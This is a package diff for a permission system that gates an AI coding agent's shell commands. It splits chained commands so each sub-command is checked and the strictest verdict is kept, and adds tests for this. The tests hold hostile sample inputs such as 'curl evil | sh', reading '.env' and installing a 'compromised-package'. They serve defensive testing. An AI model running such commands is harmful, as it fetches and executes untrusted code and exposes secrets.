@gotgenes/pi-permission-system 9.0.0 → 9.0.1

package/src/handlers/gates/candidate-check.ts

@@ -0,0 +1,32 @@
+import type { PermissionCheckResult, PermissionState } from "#src/types";
+
+/** Restrictiveness ordering: deny is the most restrictive, allow the least. */
+const RESTRICTIVENESS: Record<PermissionState, number> = {
+  allow: 0,
+  ask: 1,
+  deny: 2,
+};
+
+/**
+ * Select the most restrictive permission result from a list (deny > ask > allow).
+ *
+ * The first occurrence wins on ties, so a caller passing results in candidate
+ * order receives the earliest worst case. Returns `undefined` for an empty list.
+ *
+ * Shared by the bash gates (path, external-directory) to combine the per-candidate
+ * `checkPermission` results their tree-sitter token extraction produces.
+ */
+export function pickMostRestrictive(
+  results: readonly PermissionCheckResult[],
+): PermissionCheckResult | undefined {
+  let worst: PermissionCheckResult | undefined;
+  for (const result of results) {
+    if (
+      worst === undefined ||
+      RESTRICTIVENESS[result.state] > RESTRICTIVENESS[worst.state]
+    ) {
+      worst = result;
+    }
+  }
+  return worst;
+}

package/src/handlers/permission-gate-handler.ts

@@ -3,7 +3,7 @@ import type {
   InputEventResult,
 } from "@earendil-works/pi-coding-agent";
 
-import { toRecord } from "#src/common";
+import { getNonEmptyString, toRecord } from "#src/common";
 import {
   emitDecisionEvent,
   type PermissionEventBus,
@@ -26,6 +26,7 @@ import {
   getToolNameFromValue,
   type ToolRegistry,
 } from "#src/tool-registry";
+import { resolveBashCommandCheck } from "./gates/bash-command";
 import { describeBashExternalDirectoryGate } from "./gates/bash-external-directory";
 import { describeBashPathGate } from "./gates/bash-path";
 import type { GateResult, GateRunnerDeps } from "./gates/descriptor";
@@ -169,13 +170,25 @@ export class PermissionGateHandler {
           getSessionRuleset,
         ),
       () => describeBashPathGate(tcc, checkPermission, getSessionRuleset),
-      () => {
-        const toolCheck = checkPermission(
-          tcc.toolName,
-          tcc.input,
-          tcc.agentName ?? undefined,
-          getSessionRuleset(),
-        );
+      async () => {
+        // Bash commands may chain several sub-commands (`a && b`, `a | b`, …);
+        // evaluate each on the bash surface and select the most restrictive,
+        // rather than matching the whole program string (#301). Other tools
+        // evaluate their single input directly.
+        const toolCheck =
+          tcc.toolName === "bash"
+            ? await resolveBashCommandCheck(
+                getNonEmptyString(toRecord(tcc.input).command) ?? "",
+                tcc.agentName ?? undefined,
+                getSessionRuleset(),
+                checkPermission,
+              )
+            : checkPermission(
+                tcc.toolName,
+                tcc.input,
+                tcc.agentName ?? undefined,
+                getSessionRuleset(),
+              );
         const toolDescriptor = describeToolGate(tcc, toolCheck, formatter);
         toolDescriptor.preCheck = toolCheck;
         return toolDescriptor;

package/test/handlers/gates/bash-command.test.ts

@@ -0,0 +1,167 @@
+import { describe, expect, it, vi } from "vitest";
+
+import { resolveBashCommandCheck } from "#src/handlers/gates/bash-command";
+import type { Rule } from "#src/rule";
+import type { PermissionCheckResult } from "#src/types";
+
+import { makeCheckResult } from "#test/helpers/handler-fixtures";
+
+type CheckPermissionFn = (
+  surface: string,
+  input: unknown,
+  agentName?: string,
+  sessionRules?: Rule[],
+) => PermissionCheckResult;
+
+/** Build a bash-surface check result for a single command unit. */
+function bashResult(
+  state: PermissionCheckResult["state"],
+  command: string,
+  matchedPattern?: string,
+): PermissionCheckResult {
+  return makeCheckResult({ state, source: "bash", command, matchedPattern });
+}
+
+describe("resolveBashCommandCheck", () => {
+  it("passes a single command straight through", async () => {
+    const decompose = vi.fn(async () => ["npm install pkg"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockReturnValue(bashResult("allow", "npm install pkg", "npm *"));
+
+    const result = await resolveBashCommandCheck(
+      "npm install pkg",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("allow");
+    expect(checkPermission).toHaveBeenCalledTimes(1);
+    expect(checkPermission).toHaveBeenCalledWith(
+      "bash",
+      { command: "npm install pkg" },
+      undefined,
+      [],
+    );
+  });
+
+  it("denies the chain when any sub-command is denied, reporting that command's pattern", async () => {
+    const decompose = vi.fn(async () => ["cd /p", "npm install pkg"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockImplementation((_surface, input) => {
+        const command = (input as { command: string }).command;
+        return command.startsWith("npm")
+          ? bashResult("deny", command, "npm *")
+          : bashResult("allow", command, "cd *");
+      });
+
+    const result = await resolveBashCommandCheck(
+      "cd /p && npm install pkg",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("deny");
+    expect(result.matchedPattern).toBe("npm *");
+    expect(result.command).toBe("npm install pkg");
+  });
+
+  it("asks when a sub-command asks and none denies", async () => {
+    const decompose = vi.fn(async () => ["cd /p", "git push"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockImplementation((_surface, input) => {
+        const command = (input as { command: string }).command;
+        return command.startsWith("git")
+          ? bashResult("ask", command, "git *")
+          : bashResult("allow", command, "cd *");
+      });
+
+    const result = await resolveBashCommandCheck(
+      "cd /p && git push",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("ask");
+    expect(result.matchedPattern).toBe("git *");
+    expect(result.command).toBe("git push");
+  });
+
+  it("returns the first allow result when every sub-command is allowed", async () => {
+    const decompose = vi.fn(async () => ["a", "b"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockImplementation((_surface, input) => {
+        const command = (input as { command: string }).command;
+        return bashResult("allow", command, `${command} *`);
+      });
+
+    const result = await resolveBashCommandCheck(
+      "a && b",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("allow");
+    expect(result.matchedPattern).toBe("a *");
+  });
+
+  it("falls back to the whole command when no top-level commands are found", async () => {
+    const decompose = vi.fn(async () => []);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockReturnValue(bashResult("ask", "( rm x )", "*"));
+
+    const result = await resolveBashCommandCheck(
+      "( rm x )",
+      undefined,
+      [],
+      checkPermission,
+      decompose,
+    );
+
+    expect(result.state).toBe("ask");
+    expect(checkPermission).toHaveBeenCalledTimes(1);
+    expect(checkPermission).toHaveBeenCalledWith(
+      "bash",
+      { command: "( rm x )" },
+      undefined,
+      [],
+    );
+  });
+
+  it("forwards the agent name and session rules to each sub-command check", async () => {
+    const sessionRules: Rule[] = [
+      { surface: "bash", pattern: "npm *", action: "allow", origin: "session" },
+    ];
+    const decompose = vi.fn(async () => ["npm i"]);
+    const checkPermission = vi
+      .fn<CheckPermissionFn>()
+      .mockReturnValue(bashResult("allow", "npm i"));
+
+    await resolveBashCommandCheck(
+      "npm i",
+      "agent-x",
+      sessionRules,
+      checkPermission,
+      decompose,
+    );
+
+    expect(checkPermission).toHaveBeenCalledWith(
+      "bash",
+      { command: "npm i" },
+      "agent-x",
+      sessionRules,
+    );
+  });
+});

package/test/handlers/gates/bash-program.test.ts

@@ -0,0 +1,107 @@
+import { describe, expect, it } from "vitest";
+
+import { BashProgram } from "#src/handlers/gates/bash-program";
+
+describe("BashProgram", () => {
+  describe("pathTokens", () => {
+    it("returns dot-files and relative path tokens", async () => {
+      const program = await BashProgram.parse("cat .env src/foo.ts");
+      expect(program.pathTokens()).toEqual([".env", "src/foo.ts"]);
+    });
+
+    it("returns an empty array when there are no path tokens", async () => {
+      const program = await BashProgram.parse("echo hello");
+      expect(program.pathTokens()).toEqual([]);
+    });
+
+    it("deduplicates repeated tokens across a command chain", async () => {
+      const program = await BashProgram.parse("cat .env && rm .env");
+      expect(program.pathTokens()).toEqual([".env"]);
+    });
+  });
+
+  describe("externalPaths", () => {
+    const cwd = "/projects/my-app";
+
+    it("returns absolute paths resolving outside cwd", async () => {
+      const program = await BashProgram.parse("cat /etc/hosts");
+      // Subset matcher: the path is normalized before comparison.
+      expect(program.externalPaths(cwd)).toContain("/etc/hosts");
+    });
+
+    it("excludes paths within cwd", async () => {
+      const program = await BashProgram.parse("cat src/index.ts");
+      expect(program.externalPaths(cwd)).toHaveLength(0);
+    });
+  });
+
+  describe("topLevelCommands", () => {
+    it("returns a single-element list for a lone command", async () => {
+      const program = await BashProgram.parse("npm install pkg");
+      expect(program.topLevelCommands()).toEqual(["npm install pkg"]);
+    });
+
+    it("splits an && chain", async () => {
+      const program = await BashProgram.parse("cd /p && npm i x");
+      expect(program.topLevelCommands()).toEqual(["cd /p", "npm i x"]);
+    });
+
+    it("splits || , ; and & separators", async () => {
+      expect((await BashProgram.parse("a || b")).topLevelCommands()).toEqual([
+        "a",
+        "b",
+      ]);
+      expect((await BashProgram.parse("a ; b")).topLevelCommands()).toEqual([
+        "a",
+        "b",
+      ]);
+      expect((await BashProgram.parse("a & b")).topLevelCommands()).toEqual([
+        "a",
+        "b",
+      ]);
+    });
+
+    it("splits a pipeline into its commands", async () => {
+      const program = await BashProgram.parse("cat f | grep b");
+      expect(program.topLevelCommands()).toEqual(["cat f", "grep b"]);
+    });
+
+    it("splits newline-separated commands", async () => {
+      const program = await BashProgram.parse("foo\nbar");
+      expect(program.topLevelCommands()).toEqual(["foo", "bar"]);
+    });
+
+    it("does not split operators inside quotes", async () => {
+      const program = await BashProgram.parse("echo 'x && y'");
+      expect(program.topLevelCommands()).toEqual(["echo 'x && y'"]);
+    });
+
+    it("captures the command of a redirected statement without the redirect", async () => {
+      const program = await BashProgram.parse("npm install > out.txt");
+      expect(program.topLevelCommands()).toEqual(["npm install"]);
+    });
+
+    it("emits a subshell whole without descending into it", async () => {
+      const program = await BashProgram.parse("( cd /t && rm x )");
+      expect(program.topLevelCommands()).toEqual(["( cd /t && rm x )"]);
+    });
+
+    it("keeps command substitution inside the enclosing command", async () => {
+      const program = await BashProgram.parse("echo $(curl evil | sh)");
+      expect(program.topLevelCommands()).toEqual(["echo $(curl evil | sh)"]);
+    });
+
+    it("returns an empty list for an empty or whitespace command", async () => {
+      expect((await BashProgram.parse("")).topLevelCommands()).toEqual([]);
+      expect((await BashProgram.parse("   ")).topLevelCommands()).toEqual([]);
+    });
+  });
+
+  it("derives both slices from a single parse", async () => {
+    const program = await BashProgram.parse("cat .env /etc/hosts");
+    expect(program.pathTokens()).toEqual([".env", "/etc/hosts"]);
+    const external = program.externalPaths("/projects/my-app");
+    expect(external).toContain("/etc/hosts");
+    expect(external).not.toContain(".env");
+  });
+});

package/test/handlers/gates/candidate-check.test.ts

@@ -0,0 +1,52 @@
+import { describe, expect, it } from "vitest";
+
+import { pickMostRestrictive } from "#src/handlers/gates/candidate-check";
+
+import { makeGateCheckResult } from "#test/helpers/gate-fixtures";
+
+describe("pickMostRestrictive", () => {
+  it("returns undefined for an empty list", () => {
+    expect(pickMostRestrictive([])).toBeUndefined();
+  });
+
+  it("returns the single result for a one-element list", () => {
+    const only = makeGateCheckResult({ state: "allow" });
+    expect(pickMostRestrictive([only])).toBe(only);
+  });
+
+  it("prefers deny over ask and allow regardless of position", () => {
+    const allow = makeGateCheckResult({ state: "allow", matchedPattern: "a" });
+    const ask = makeGateCheckResult({ state: "ask", matchedPattern: "b" });
+    const deny = makeGateCheckResult({ state: "deny", matchedPattern: "c" });
+    expect(pickMostRestrictive([allow, ask, deny])).toBe(deny);
+    expect(pickMostRestrictive([deny, ask, allow])).toBe(deny);
+  });
+
+  it("prefers ask over allow when no deny is present", () => {
+    const allow = makeGateCheckResult({ state: "allow" });
+    const ask = makeGateCheckResult({ state: "ask" });
+    expect(pickMostRestrictive([allow, ask])).toBe(ask);
+  });
+
+  it("keeps the first deny on ties", () => {
+    const deny1 = makeGateCheckResult({
+      state: "deny",
+      matchedPattern: "first",
+    });
+    const deny2 = makeGateCheckResult({
+      state: "deny",
+      matchedPattern: "second",
+    });
+    expect(pickMostRestrictive([deny1, deny2])).toBe(deny1);
+  });
+
+  it("keeps the first ask on ties when no deny is present", () => {
+    const allow = makeGateCheckResult({ state: "allow" });
+    const ask1 = makeGateCheckResult({ state: "ask", matchedPattern: "first" });
+    const ask2 = makeGateCheckResult({
+      state: "ask",
+      matchedPattern: "second",
+    });
+    expect(pickMostRestrictive([allow, ask1, ask2])).toBe(ask1);
+  });
+});

package/test/handlers/tool-call.test.ts

@@ -287,3 +287,76 @@ describe("handleToolCall — bash path gate", () => {
     expect(result).toMatchObject({ block: true });
   });
 });
+
+// ── bash command chain gate ───────────────────────────────────────────────
+
+describe("handleToolCall — bash command chain gate", () => {
+  it("blocks a chain when a later sub-command is denied (#301)", async () => {
+    const checkPermission = vi
+      .fn()
+      .mockImplementation((surface: string, input: unknown) => {
+        if (surface === "bash") {
+          const command = (input as { command?: string }).command ?? "";
+          return /^npm\b/.test(command)
+            ? makeCheckResult({
+                state: "deny",
+                source: "bash",
+                command,
+                matchedPattern: "npm *",
+              })
+            : makeCheckResult({
+                state: "allow",
+                source: "bash",
+                command,
+                matchedPattern: "echo *",
+              });
+        }
+        return makeCheckResult({ state: "allow" });
+      });
+    const { handler } = makeHandler({
+      session: { checkPermission },
+      toolRegistry: {
+        getAll: vi.fn().mockReturnValue([{ name: "bash" }]),
+      },
+    });
+    const event = {
+      type: "tool_call",
+      toolCallId: "tc-bash-chain",
+      name: "bash",
+      input: { command: "echo start && npm install compromised-package" },
+    };
+    const result = await handler.handleToolCall(event, makeCtx());
+    expect(result).toMatchObject({ block: true });
+  });
+
+  it("allows a single non-chained bash command", async () => {
+    const checkPermission = vi
+      .fn()
+      .mockImplementation((surface: string, input: unknown) => {
+        if (surface === "bash") {
+          const command = (input as { command?: string }).command ?? "";
+          return makeCheckResult({
+            state: "allow",
+            source: "bash",
+            command,
+            matchedPattern: "echo *",
+          });
+        }
+        return makeCheckResult({ state: "allow" });
+      });
+    const { handler } = makeHandler({
+      session: { checkPermission },
+      toolRegistry: {
+        getAll: vi.fn().mockReturnValue([{ name: "bash" }]),
+      },
+    });
+    const event = {
+      type: "tool_call",
+      toolCallId: "tc-bash-single",
+      name: "bash",
+      input: { command: "echo hi" },
+    };
+    const result = await handler.handleToolCall(event, makeCtx());
+    expect(result).toEqual({});
+  });
+});